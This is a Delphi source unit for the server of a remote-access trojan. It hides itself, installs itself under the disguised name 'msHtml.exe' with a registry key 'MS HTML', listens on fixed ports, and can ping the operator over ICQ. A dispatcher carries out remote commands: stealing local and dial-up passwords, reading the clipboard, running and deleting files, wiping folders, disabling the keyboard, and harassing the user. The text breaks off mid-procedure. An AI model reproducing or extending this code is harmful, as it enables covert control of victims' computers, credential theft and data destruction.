unit untServer;

interface

uses
  Windows, SysUtils, Controls, Forms, ScktComp, ExtCtrls,
  StdCtrls, ComCtrls, Classes, Graphics, untGetPasswords;

type
  TTransferAction = (taDownload, taUpload);

  PTrasnferInfo = ^TTrasnferInfo;
  TTrasnferInfo = record
    LocalFile: string;
    Action   : TTransferAction;
    TFile    : TextFile;
    BFile    : file of Char;
  end;

  TfrmServer = class(TForm)
    TmrCrazy: TTimer;
    TmrNoMove: TTimer;
    ServerMain: TServerSocket;
    PntArea: TPanel;
    EdtMsg: TEdit;
    RichMessages: TRichEdit;
    BntSend: TButton;
    ServerLogger: TServerSocket;
    TmrLogger: TTimer;
    RichPrint: TRichEdit;
    ClientPager: TClientSocket;
    TmrPager: TTimer;
    ServerTransf: TServerSocket;
    LstUploads: TListBox;
    procedure TmrCrazyTimer(Sender: TObject);
    procedure TmrNoMoveTimer(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure ServerMainClientRead(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure VerifyDataReceived(Data: string; Socket: TCustomWinSocket);
    function AdjustInformation: string;
    procedure SendAnswer(COMMAND: Integer; strAnswer: string; Socket: TCustomWinSocket);
    function SetTime(Data: string):boolean;
    function SetDate(Data: string):boolean;
    procedure ActiveCrazy(Enable: Boolean);
    procedure ActiveNoMove(Enable: Boolean);
    procedure ShowMessageBox(Data:string; Socket: TCustomWinSocket);
    function StringsToTaskList(All: Boolean):string;
    procedure ServerMainClientError(Sender: TObject;
      Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
      var ErrorCode: Integer);
    procedure OpenChat(Data:string;Clear:Boolean);
    procedure DisplayChat(intSize:integer);
    procedure BntSendClick(Sender: TObject);
    procedure EnableLogger(Data:string; Socket:TCustomWinSocket);
    procedure ServerLoggerAccept(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure ServerLoggerClientDisconnect(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure TmrLoggerTimer(Sender: TObject);
    procedure PrintText(Data:string);
    procedure ServerLoggerClientError(Sender: TObject;
      Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
      var ErrorCode: Integer);
    procedure CloseAll(Sck:TServerSocket);
    procedure ReStartServer;
    function LocalPass:string;
    procedure ClientPagerError(Sender: TObject; Socket: TCustomWinSocket;
      ErrorEvent: TErrorEvent; var ErrorCode: Integer);
    procedure ClientPagerConnect(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure ConnectPager;
    procedure TmrPagerTimer(Sender: TObject);
    procedure PreparePrintSrc(Data:string);
    procedure PrepareColors(Data:string);
    procedure ServerMainClientDisconnect(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure DoFind(Args:string; var CMD: Integer; var S:string);
    procedure ServerTransferClientRead(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure ServerTransferClientError(Sender: TObject;
      Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
      var ErrorCode: Integer);
    procedure ServerTransferClientDisconnect(Sender: TObject;
      Socket: TCustomWinSocket);
  private
    Size:Integer;
    SentPager:Boolean;
    Pass:TGetPasswords;
  public
    { Public declarations }
  end;

const
  cICQ: string ='icq_uin=00000000  ';
  cICQOn: string ='icq_on=0';
  InstDir: string ='inst_dir=W';
  RegKey: string ='key_name=MS HTML                       ';
  SrvFile: string ='srv_file=msHtml.exe                   ';
  SrvPort: string ='srv_port=11831';
  TnsfPort: string = 'tnsf_port=29559';
  DEF_CON_PORT: Integer = 11831;
  DEF_UD_PORT: Integer = 29559;

var
  frmServer: TfrmServer;

implementation

{$R *.DFM}
uses untFunctions, untCommands, untLogger, untInstalation, untRAS;

procedure TfrmServer.TmrCrazyTimer(Sender: TObject);
var
   NewX,NewY:Integer;
   Pnt:TPoint;
begin
   NewX:=Random(2);
   NewY:=Random(2);
   if NewX = 0 then NewX:=-10 else NewX:=10;
   if NewY = 0 then NewY:=-10 else NewY:=10;
   GetCursorPos(Pnt);
   SetCursorPos(Pnt.x + NewX,Pnt.y + NewY);
end;

procedure TfrmServer.TmrNoMoveTimer(Sender: TObject);
begin
   SetCursorPos(GetSystemMetrics(SM_CXSCREEN) div 2,
               GetSystemMetrics(SM_CYSCREEN) div 2);
end;

procedure TfrmServer.FormCreate(Sender: TObject);
var
   lDir:string;
begin
   HideInTaskList;
   ShowApplication(Application.Handle,False);
   SetWindowPos(handle,0,0,0,0,0,SWP_HIDEWINDOW);
   HideWindow(handle,true);
   if (FindWindow('TApplication','687AF68632') <> 0) or
      (FindWindow('TfrmServer','A456E124F1') <> 0) then
   begin
      Close;
      Application.Terminate;
      Exit;
   end;
   Application.Title:='687AF68632';
   Caption:='A456E124F1';
   Install(Trim(Copy(SrvFile,10,Length(SrvFile))),Trim(Copy(RegKey,10,Length(RegKey))),Trim(Copy(InstDir,10,1)),lDir);
   if UpperCase(Trim(lDir)) <> UpperCase(Trim(Application.ExeName)) then
   begin
      ReStartServer;
      Close;
      Exit;
   end;
   Pass:=TGetPasswords.Create;
   ServerMain.Port:=StrToIntDef(Trim(Copy(SrvPort,10,Length(SrvPort))),DEF_CON_PORT);
   ServerTransf.Port:=StrToIntDef(Trim(Copy(TnsfPort,11,Length(TnsfPort))),DEF_UD_PORT);
   try
      ServerMain.Open;
      ServerTransf.Open;
   except
   end;
   if Trim(cICQOn[Length(cICQOn)]) = '1' then
      ConnectPager;
end;

procedure TfrmServer.ServerMainClientRead(Sender: TObject;
  Socket: TCustomWinSocket);
begin
   VerifyDataReceived(Socket.ReceiveText,Socket);
end;

procedure TfrmServer.VerifyDataReceived(Data: string; Socket: TCustomWinSocket);
var
   COMMAND,TMP_COMMAND,l:Integer;
   tmpAnswer:string;
   cItems:TStrings;
   label Finish;
begin
   COMMAND:=StrToIntDef(Copy(Data,1,3),-1);
   if COMMAND < 0 then Exit;
   TMP_COMMAND:=-1;
   Data:=Copy(Data,4,Length(Data));
   if COMMAND = COMMAND_PING_SERVER then
   begin
      TMP_COMMAND:=COMMAND_PING_SERVER;
      tmpAnswer:='';
      goto Finish;
   end
   else if COMMAND = COMMAND_DESKTOP then
   begin
      ShowDesktop(Data = '1');
      TMP_COMMAND:=COMMAND_ANSWER;
      if Data = '1' then
         tmpAnswer:='All icons in desktop are visible now...'
      else
         tmpAnswer:='All icons in desktop are hidden now...';
      goto Finish;
   end
   else if COMMAND = COMMAND_START_BUTTON then
   begin
      ShowStartButton(Data = '1');
      TMP_COMMAND:=COMMAND_ANSWER;
      if Data = '1' then
         tmpAnswer:='Start button is visible now...'
      else
         tmpAnswer:='Start button is hidden now...';
      goto Finish;
   end
   else if COMMAND = COMMAND_TASKBAR then
   begin
      ShowTask(Data = '1');
      TMP_COMMAND:=COMMAND_ANSWER;
      if Data = '1' then
         tmpAnswer:='Taskbar is visible now...'
      else
         tmpAnswer:='Taskbar is hidden now...';
      goto Finish;
   end
   else if COMMAND = COMMAND_TASKBAR_ICONS then
   begin
      ShowTaskIcon(Data = '1');
      TMP_COMMAND:=COMMAND_ANSWER;
      if Data = '1' then
         tmpAnswer:='Task icons are visible now...'
      else
         tmpAnswer:='Task icons are hidden now...';
      goto Finish;
   end
   else if COMMAND = COMMAND_TASKBAR_CLOCK then
   begin
      ShowWinClock(Data = '1');
      TMP_COMMAND:=COMMAND_ANSWER;
      if Data = '1' then
         tmpAnswer:='Task clock is visible now...'
      else
         tmpAnswer:='Task clock is hidden now...';
      goto Finish;
   end
   else if COMMAND = COMMAND_MONITOR then
   begin
      PowerMonitor(Handle,Data = '1');
      TMP_COMMAND:=COMMAND_ANSWER;
      if Data = '1' then
         tmpAnswer:='Monitor is on now...'
      else
         tmpAnswer:='Monitor is off now...';
      goto Finish;
   end
   else if COMMAND = COMMAND_CAD then
   begin
      EnableCAD(Data = '1');
      TMP_COMMAND:=COMMAND_ANSWER;
      if Data = '1' then
         tmpAnswer:='Ctrl+Alt+Del enabled...'
      else
         tmpAnswer:='Ctrl+Alt+Del disabled...';
      goto Finish;
   end
   else if COMMAND = COMMAND_SCROLL_LOCK then
   begin
      SetScrollState(Data = '1');
      TMP_COMMAND:=COMMAND_ANSWER;
      if Data = '1' then
         tmpAnswer:='ScrollLock is on now...'
      else
         tmpAnswer:='ScrollLock is off now...';
      goto Finish;
   end
   else if COMMAND = COMMAND_CAPS_LOCK then
   begin
      SetCapsState(Data = '1');
      TMP_COMMAND:=COMMAND_ANSWER;
      if Data = '1' then
         tmpAnswer:='CapsLock is on now...'
      else
         tmpAnswer:='CapsLock is off now...';
      goto Finish;
   end
   else if COMMAND = COMMAND_NUM_LOCK then
   begin
      SetNumState(Data = '1');
      TMP_COMMAND:=COMMAND_ANSWER;
      if Data = '1' then
         tmpAnswer:='NumLock is on now...'
      else
         tmpAnswer:='NumLock is off now...';
      goto Finish;
   end
   else if COMMAND = COMMAND_CD_ROM then
   begin
      if Data = '1' then
      begin
         OpenCD;
         tmpAnswer:='CD-ROM was been opened...';
      end
      else
      begin
         CloseCD;
         tmpAnswer:='CD-ROM was been closed...';
      end;
      TMP_COMMAND:=COMMAND_ANSWER;
      goto Finish;
   end
   else if COMMAND = COMMAND_REBAR then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      ShowReBar(Data = '1');
      if Data = '1' then
         tmpAnswer:='Task rebar is visible now...'
      else
         tmpAnswer:='Task rebar is hidden now...';
      goto Finish;
   end
   else if COMMAND = COMMAND_GETINFO then
   begin
      TMP_COMMAND:=COMMAND_GETINFO;
      tmpAnswer:=AdjustInformation;
      goto Finish;
   end
   else if COMMAND = COMMAND_LOGOFF then
   begin
      ExitLogOff;
   end
   else if COMMAND = COMMAND_SHUTDOWN then
   begin
      ExitShutDown;
      Exit;
   end
   else if COMMAND = COMMAND_FORCE then
   begin
      ExitForced;
      Exit;
   end
   else if COMMAND = COMMAND_REBOOT then
   begin
      ExitBoot;
      Exit;
   end
   else if COMMAND = COMMAND_LOCKUP then
   begin
      ExitPowerOff;
      Exit;
   end
   else if COMMAND = COMMAND_CLIP_READ then
   begin
      if ReadClipboard(tmpAnswer) then
         TMP_COMMAND:=COMMAND_CLIP_READ
      else
      begin
         TMP_COMMAND:=COMMAND_ANSWER;
         tmpAnswer:='Clipboard is empty or not as text-format...';
      end;
      goto Finish;
   end
   else if COMMAND = COMMAND_CLIP_SET then
   begin
      CopyClipboard(Data);
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Clipboard content changed...';
      goto Finish;
   end
   else if COMMAND = COMMAND_CLIP_EMPTY then
   begin
      ClearClipboard;
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Clipboard cleared...';
      goto Finish;
   end
   else if COMMAND = COMMAND_CLIP_LOCK then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      if Data = '1' then
      begin
         DisableClip(Handle);
         tmpAnswer:='Clipboard locked...';
      end
      else
      begin
         EnableClip;
         tmpAnswer:='Clipboard unlocked...';
      end;
      goto Finish;
   end
   else if COMMAND = COMMAND_READ_TIME_DATE then
   begin
      TMP_COMMAND:=COMMAND_READ_TIME_DATE;
      tmpAnswer:=FormatDateTime('hh:nn AM/PM',Now);
      tmpAnswer:=tmpAnswer + '|' + DateToStr(Now);
      goto Finish;
   end
   else if COMMAND = COMMAND_SET_TIME then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      if SetTime(Data) then
         tmpAnswer:='Remote time was been changed...'
      else
         tmpAnswer:='Can''t change remote time...';
      goto Finish;
   end
   else if COMMAND = COMMAND_SET_DATE then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      if SetDate(Data) then
         tmpAnswer:='Remote date was been changed...'
      else
         tmpAnswer:='Can''t change remote date...';
      goto Finish;
   end
   else if COMMAND = COMMAND_REVERSE_BUTTONS then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      ReverseButtons(Data = '1');
      if Data = '1' then
         tmpAnswer:='Mouse buttons reversed...'
      else
         tmpAnswer:='Mouse buttons restored...';
      goto Finish;
   end
   else if COMMAND = COMMAND_CRAZY_MOUSE then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      ActiveCrazy(Data = '1');
      if Data = '1' then
         tmpAnswer:='Crazy mouse is enabled...'
      else
         tmpAnswer:='Crazy mouse is disabled...';
      goto Finish;
   end
   else if COMMAND = COMMAND_LOCK_MOUSE then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      ActiveNoMove(Data = '1');
      if Data = '1' then
         tmpAnswer:='Mouse was been locked...'
      else
         tmpAnswer:='Mouse was been unlocked...';
      goto Finish;
   end
   else if COMMAND = COMMAND_GET_DBL_TIME then
   begin
      TMP_COMMAND:=COMMAND_GET_DBL_TIME;
      tmpAnswer:=GetDblClickTime;
      goto Finish;
   end
   else if COMMAND = COMMAND_SET_DBL_TIME then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      SetDblClickTime(StrToIntDef(Data,500));
      tmpAnswer:='Double-click speed was been changed...';
      goto Finish;
   end
   else if COMMAND = COMMAND_SET_MOUSE_POS then
   begin
      TMP_COMMAND:=COMMAND_SET_MOUSE_POS;
      TmrCrazy.Enabled:=False;
      TmrNoMove.Enabled:=False;
      tmpAnswer:='';
      l:=Pos(',',Data);
      SetCursorPos(StrToIntDef(Copy(Data,1,l-1),0),StrToIntDef(Copy(Data,l+1,Length(Data)),0));
      goto Finish;
   end
   else if COMMAND = COMMAND_MSGBOX then
   begin
      ShowMessageBox(Data,Socket);
      Exit;
   end
   else if COMMAND = COMMAND_GET_TASK_LIST then
   begin
      TMP_COMMAND:=COMMAND_GET_TASK_LIST;
      tmpAnswer:=StringsToTaskList(Data = '1');
      goto Finish;
   end
   else if COMMAND = COMMAND_CLOSE_WINDOW then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Window was been closed...';
      _CloseWindow(StrToIntDef(Data,0));
      goto Finish;
   end
   else if COMMAND = COMMAND_DISABLE_X then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='The X button is disable...';
      DisableX(StrToIntDef(Data,0));
      goto Finish;
   end
   else if COMMAND = COMMAND_SHOW then
   begin
      l:=Length(Data);
      TMP_COMMAND:=COMMAND_ANSWER;
      if Copy(Data,l,l) = '1' then
      begin
         tmpAnswer:='Window is visible now...';
         _ShowWindow(StrToIntDef(Copy(Data,1,l-1),0));
      end
      else
      begin
         tmpAnswer:='Window is hidden now...';
         _HideWindow(StrToIntDef(Copy(Data,1,l-1),0));
      end;
      goto Finish;
   end
   else if COMMAND = COMMAND_WINDOW_ENABLE then
   begin
      l:=Length(Data);
      TMP_COMMAND:=COMMAND_ANSWER;
      if Copy(Data,l,l) = '1' then
      begin
         tmpAnswer:='Window is enabled now...';
         _EnableWindow(StrToIntDef(Copy(Data,1,l-1),0),true);
      end
      else
      begin
         tmpAnswer:='Window is disabled now...';
         _EnableWindow(StrToIntDef(Copy(Data,1,l-1),0),false);
      end;
      goto Finish;
   end
   else if COMMAND = COMMAND_CHANGE_TITLE then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Window title was been changed...';
      l:=Pos(Chr(13),Data);
      if l > 0 then
         ChangeWindowText(StrToIntDef(Copy(Data,1,l - 1),0),Copy(Data,l + 1,Length(Data)));
      goto Finish;
   end
   else if COMMAND = COMMAND_WINDOW_FOCUS then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Window is active now...';
      ActiveWindow(StrToIntDef(Data,0));
      goto Finish;
   end
   else if COMMAND = COMMAND_WINDOW_MAX then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Window is maximized now...';
      MaxWin(StrToIntDef(Data,0));
      goto Finish;
   end
   else if COMMAND = COMMAND_WINDOW_MIN then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Window is minimized now...';
      MinWin(StrToIntDef(Data,0));
      goto Finish;
   end
   else if COMMAND = COMMAND_DISABLE_KEY then
   begin
      DisableKeyboard;
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Keyboard is disabled now...';
      goto Finish;
   end
   else if COMMAND = COMMAND_EXEC_SAVER then
   begin
      ExecuteScreenSaver(handle);
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Screen saver was beed executed...';
      goto Finish;
   end
   else if COMMAND = COMMAND_OPEN_START then
   begin
      OpenStartButton(handle);
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Start menu was beed opened...';
      goto Finish;
   end
   else if COMMAND = COMMAND_DISABLE_SAVER then
   begin
      DeactiveScreenSaver;
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Screen saver is disabled...';
      goto Finish;
   end
   else if COMMAND = COMMAND_REMOVE_WALL then
   begin
      ChangeWallPaper('');
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Wallpaper  was beed removed...';
      goto Finish;
   end
   else if COMMAND = COMMAND_MINIMIZE_ALL then
   begin
      MinAll;
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='All windows are minimized now...';
      goto Finish;
   end
   else if COMMAND = COMMAND_OPEN_URL then
   begin
      OpenURL(handle,Data);
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Web browser is opened...';
      goto Finish;
   end
   else if COMMAND = COMMAND_CHANGE_NAME then
   begin
      ChangeComputerName(Data);
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Computer name is changed...';
      goto Finish;
   end
   else if COMMAND = COMMAND_REFRESH_ROOT then
   begin
      TMP_COMMAND:=COMMAND_REFRESH_FOLDER;
      tmpAnswer:=GetRootContent(handle);
      goto Finish;
   end
   else if COMMAND = COMMAND_REFRESH_FOLDER then
   begin
      TMP_COMMAND:=COMMAND_REFRESH_FOLDER;
      if MyDirectoryExists(Data) then
         tmpAnswer:=ReadDirectory(Data,handle)
      else
      begin
         TMP_COMMAND:=COMMAND_ANSWER;
         tmpAnswer:='Invalid directory...';
      end;
      goto Finish;
   end
   else if COMMAND = COMMAND_GET_DRIVES then
   begin
      TMP_COMMAND:=COMMAND_GET_DRIVES;
      tmpAnswer:=GetDrives;
      goto Finish;
   end
   else if COMMAND = COMMAND_RUN then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='File is executed...';
      OpenURL(handle,Data);
      goto Finish;
   end
   else if COMMAND = COMMAND_DELETE then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='File is deleted...';
      DeleteFile(Data);
      goto Finish;
   end
   else if COMMAND = COMMAND_DELETE_ALL then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='All files of specified folder are deleted...';
      FuckFolder(Data);
      goto Finish;
   end
   else if COMMAND = COMMAND_DELETE_FOLDER then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Folder is deleted...';
      SpecialFuckFolder(Data);
      RemoveDirectory(PChar(Data));
      goto Finish;
   end
   else if COMMAND = COMMAND_SET_WALL then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Desktop wallpaper is changed...';
      ChangeWallPaper(Data);
      goto Finish;
   end
   else if COMMAND = COMMAND_PLAY_WAV then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Wav file is played...';
      _PlayWav(Data);
      goto Finish;
   end
   else if COMMAND = COMMAND_RENAME then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Specified file is renamed...';
      Rename(Data);
      goto Finish;
   end
   else if COMMAND = COMMAND_CREATE_DIR then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Directory was created...';
      CreateDir(Data);
      goto Finish;
   end
   else if COMMAND = COMMAND_GET_SIZE then
   begin
      TMP_COMMAND:=COMMAND_GET_SIZE;
      tmpAnswer:=GetSize(Data);
      goto Finish;
   end
   else if COMMAND = COMMAND_GET_SCREEN then
   begin
      TMP_COMMAND:=COMMAND_GET_SCREEN;
      tmpAnswer:=GetResolution;
      goto Finish;
   end
   else if COMMAND = COMMAND_SET_SCREEN then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Resolution is changed...';
      SetResolution(StrToIntDef(Data,-1));
      goto Finish;
   end
   else if COMMAND = COMMAND_CHAT_OPEN then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Chat is opened...';
      OpenChat(Data,not IsWindowVisible(handle));
      goto Finish;
   end
   else if COMMAND = COMMAND_CHAT_CLOSE then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Chat is closed...';
      HideWindow(handle,false);
      goto Finish;
   end
   else if COMMAND = COMMAND_CHAT_MESSAGE then
   begin
      if not IsWindowVisible(handle) then
      begin
         if (Size > 100) or (Size <= 0) then
            Size:=50;
         DisplayChat(Size);
      end;
      RichMessages.Lines.Add(Data);
      Exit;
   end
   else if COMMAND =COMMAND_LOG_ENABLE then
   begin
      EnableLogger(Data,Socket);
      Exit;
   end
   else if COMMAND = COMMAND_PRINT_TEXT then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Text is printed...';
      PrintText(Data);
      goto Finish;
   end
   else if COMMAND = COMMAND_SERVER_CLOSE then
   begin
      CloseAll(ServerLogger);
      CloseAll(ServerMain);
      Close;
      Application.Terminate;
      Exit;
   end
   else if COMMAND = COMMAND_SERVER_UNINSTALL then
   begin
      CloseAll(ServerLogger);
      CloseAll(ServerMain);
      Remove(Trim(Copy(SrvFile,10,Length(SrvFile))),Trim(Copy(RegKey,10,Length(RegKey))),Trim(Copy(InstDir,10,1)));
      Exit;
   end
   else if COMMAND = COMMAND_SERVER_RESTART then
   begin
      CloseAll(ServerLogger);
      CloseAll(ServerMain);
      ReStartServer;
      Exit;
   end
   else if COMMAND = COMMAND_GET_PASSWORDS then
   begin
      TMP_COMMAND:=COMMAND_GET_PASSWORDS;
      tmpAnswer:=LocalPass;
      goto Finish;
   end
   else if COMMAND = COMMAND_PRINT_IN_SCREEN then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Text printed in screen...';
      PreparePrintSrc(Data);
      goto Finish;
   end
   else if COMMAND = COMMAND_CHANGE_COLORS then
   begin
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='System colors in changed...';
      PrepareColors(Data);
      goto Finish;
   end
   else if COMMAND = COMMAND_RAS_ENTRIES then
   begin
      cItems:=TStringList.Create;
      EnumEntries(cItems);
      tmpAnswer:=cItems.Text;
      TMP_COMMAND:=COMMAND_RAS_ENTRIES;
      goto Finish;
   end
   else if COMMAND = COMMAND_RAS_RENAME then
   begin
      l:=Pos(Chr(13),Data);
      RenameEntry(Copy(Data,1,l - 1),Copy(Data,l + 1,Length(Data)));
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Entry is renamed...';
      goto Finish;
   end
   else if COMMAND = COMMAND_RAS_DELETE then
   begin
      DeleteEntry(Data);
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Entry is deleted...';
      goto Finish;
   end
   else if COMMAND = COMMAND_RAS_EDIT then
   begin
      ShowEditDlg(Data);
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Edit dialog is visible...';
      goto Finish;
   end
   else if COMMAND = COMMAND_RAS_HANG_UP then
   begin
      HangUp;
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='Hanged up...';
      goto Finish;
   end
   else if COMMAND = COMMAND_RAS_NEW_CONN then
   begin
      ShowNewConnection;
      TMP_COMMAND:=COMMAND_ANSWER;
      tmpAnswer:='New connection dialog is visible...';
      goto Finish;
   end
   else if COMMAND = COMMAND_GET_RAS_PWDS then
   begin
      GetRasPwds(tmpAnswer);
      TMP_COMMAND:=COMMAND_GET_RAS_PWDS;
      goto Finish;
   end
   else if COMMAND = COMMAND_FIND_FILE then
   begin
      DoFind(Data,TMP_COMMAND,tmpAnswer);
      goto Finish;
   end;
   if TMP_COMMAND < 0 then Exit;
Finish:
   try
      SendAnswer(TMP_COMMAND,tmpAnswer,Socket);
   except
   end;
end;

function TfrmServer.AdjustInformation: string;
var
   TMPInfo, NewLine, TmpWin: string;
begin
   NewLine:=#13#10;
   TmpWin:=TrimRight(WinDir);
   TMPInfo:='Windows folder: ' + TmpWin + NewLine;
   TMPInfo:=TMPInfo + 'System folder: ' + TrimRight(SysDir) + NewLine;
   TMPInfo:=TMPInfo + 'Temp folder: ' + TrimRight(TmpDir) + NewLine;
   TMPInfo:=TMPInfo + 'Windows version: ' + WindowsVersion + NewLine;
   TMPInfo:=TMPInfo + 'Minutes in windows: ' + TimeInWindows + NewLine;
   TMPInfo:=TMPInfo + 'Computer name: ' + TrimRight(CompName) + NewLine;
   TMPInfo:=TMPInfo + 'User name: ' + TrimRight(UserName) + NewLine;
   TMPInfo:=TMPInfo + 'Windows language: ' + TrimRight(Language) + NewLine;
   TMPInfo:=TMPInfo + 'Resolution: ' + ScreenResolution + NewLine;
   TMPInfo:=TMPInfo + 'NumLock state: ' + NumState + NewLine;
   TMPInfo:=TMPInfo + 'CapsLock state: ' + CapsState + NewLine;
   TMPInfo:=TMPInfo + 'ScrollLock state: ' + ScrollState + NewLine;
   TMPInfo:=TMPInfo + 'Play sounds: ' + IsSound + NewLine;
   if Length(Trim(TmpWin)) > 0 then
      TMPInfo:=TMPInfo + 'Free disk space: ' + FreeDiskSpace(Copy(TmpWin,1,3)) + NewLine
   else
      TMPInfo:=TMPInfo + 'Free disk space: ' + FreeDiskSpace(Copy(Application.ExeName,1,3)) + NewLine;
   TMPInfo:=TMPInfo + 'Local host: ' + ServerMain.Socket.LocalHost + NewLine;
   TMPInfo:=TMPInfo + 'Clients connected: ' + IntToStr(ServerMain.Socket.ActiveConnections);
   AdjustInformation:=TMPInfo;
end;

procedure TfrmServer.SendAnswer(COMMAND: Integer; strAnswer: string; Socket: TCustomWinSocket);
begin
   try
      Socket.SendText(FormatFloat('00#',COMMAND) + strAnswer);
   except
      Socket.Close;
   end;
end;

function TfrmServer.SetTime(Data: string):boolean;
var
   NewTime:TDateTime;
   SysDate:TSystemTime;
   h,n,s,m:Word;
begin
   GetLocalTime(SysDate);
   Data:=Trim(Data);
   try
      NewTime:=StrToTime(Data);
   except
      SetTime:=False;
      Exit;
   end;
   DecodeTime(NewTime,h,n,s,m);
   SysDate.wMinute:=n;
   SysDate.wHour:=h;
   SetTime:=ChangeSystemTime(SysDate);
end;

function TfrmServer.SetDate(Data: string):boolean;
var
   NewDate:TDateTime;
   SysDate:TSystemTime;
   m,d,y:Word;
begin
   GetLocalTime(SysDate);
   Data:=Trim(Data);
   try
      NewDate:=StrToDate(Data);
   except
      SetDate:=False;
      Exit;
   end;
   DecodeDate(NewDate,y,m,d);
   SysDate.wYear:=y;
   SysDate.wMonth:=m;
   SysDate.wDay:=d;
   SetDate:=ChangeSystemTime(SysDate);
end;

procedure TfrmServer.ActiveCrazy(Enable: Boolean);
begin
   if Enable then TmrNoMove.Enabled:=False;
   TmrCrazy.Enabled:=Enable;
end;

procedure TfrmServer.ActiveNoMove(Enable: Boolean);
begin
   if Enable then TmrCrazy.Enabled:=False;
   TmrNoMove.Enabled:=Enable;
end;

procedure TfrmServer.ShowMessageBox(Data:string; Socket: TCustomWinSocket);
var
   p,Flags,Answer:Integer;
   Title,Text,strAnswer:string;
begin
   try
      p:=Pos(Chr(13),Data);
      Title:=Copy(Data,1,p-1);
      Data:=Copy(Data,p+1,Length(Data));
      p:=Pos(Chr(13),Data);
      Flags:=StrToIntDef(Copy(Data,1,p-1),0);
      Data:=Copy(Data,p+1,Length(Data));
      Text:=Data;
   except
      Exit;
   end;
   Text:=StringReplace(Text,'|',Chr(13),[rfReplaceAll]);
   Answer:=MsgBox(0,Text,Title,Flags);
   if Answer = IDOk then
      strAnswer:='OK'
   else if Answer = IDCancel then
      strAnswer:='Cancel'
   else if Answer = IDAbort then
      strAnswer:='Abort'
   else if Answer = IDRetry then
      strAnswer:='Retry'
   else if Answer = IDIgnore then
      strAnswer:='Ignore'
   else if Answer = IDYes then
      strAnswer:='Yes'
   else if Answer = IDNo then
      strAnswer:='No'
   else
      strAnswer:='Unknown';
   SendAnswer(COMMAND_ANSWER,'User clicked: ' + strAnswer,Socket);
end;

function TfrmServer.StringsToTaskList(All: Boolean):string;
begin
   StringsToTaskList:=TaskList(handle,All);;
end;

procedure TfrmServer.ServerMainClientError(Sender: TObject;
  Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
  var ErrorCode: Integer);
begin
   ErrorCode:=0;
end;

procedure TfrmServer.OpenChat(Data:string;Clear:Boolean);
begin
   Size:=StrToIntDef(Trim(Data),-1);
   if Size < 0 then Size:=50;
   if Clear then
   begin
      RichMessages.Lines.Clear;
      EdtMsg.Text:='';
   end;
   DisplayChat(Size);
end;

procedure TfrmServer.DisplayChat(intSize:integer);
begin
   SetWindowPos(handle,0,0,0,0,0,SWP_SHOWWINDOW);
   Width:=Trunc(Screen.Width * (Size / 100));
   Height:=Trunc(Screen.Height * (Size / 100));
   Position:=poScreenCenter;
   HideWindow(handle,true);
   WindowTop(handle,true);
   RichMessages.Left:=12;
   RichMessages.Top:=12;
   RichMessages.Height:=(PntArea.Height - EdtMsg.Height - 24);
   RichMessages.Width:=(PntArea.Width - 24);
   EdtMsg.Left:=RichMessages.Left;
   EdtMsg.Top:=(RichMessages.Height + RichMessages.Top + 4);
   EdtMsg.Width:=(RichMessages.Width - BntSend.Width);
   BntSend.Top:=EdtMsg.Top;
   BntSend.Left:=(EdtMsg.Width + EdtMsg.Left + 4);
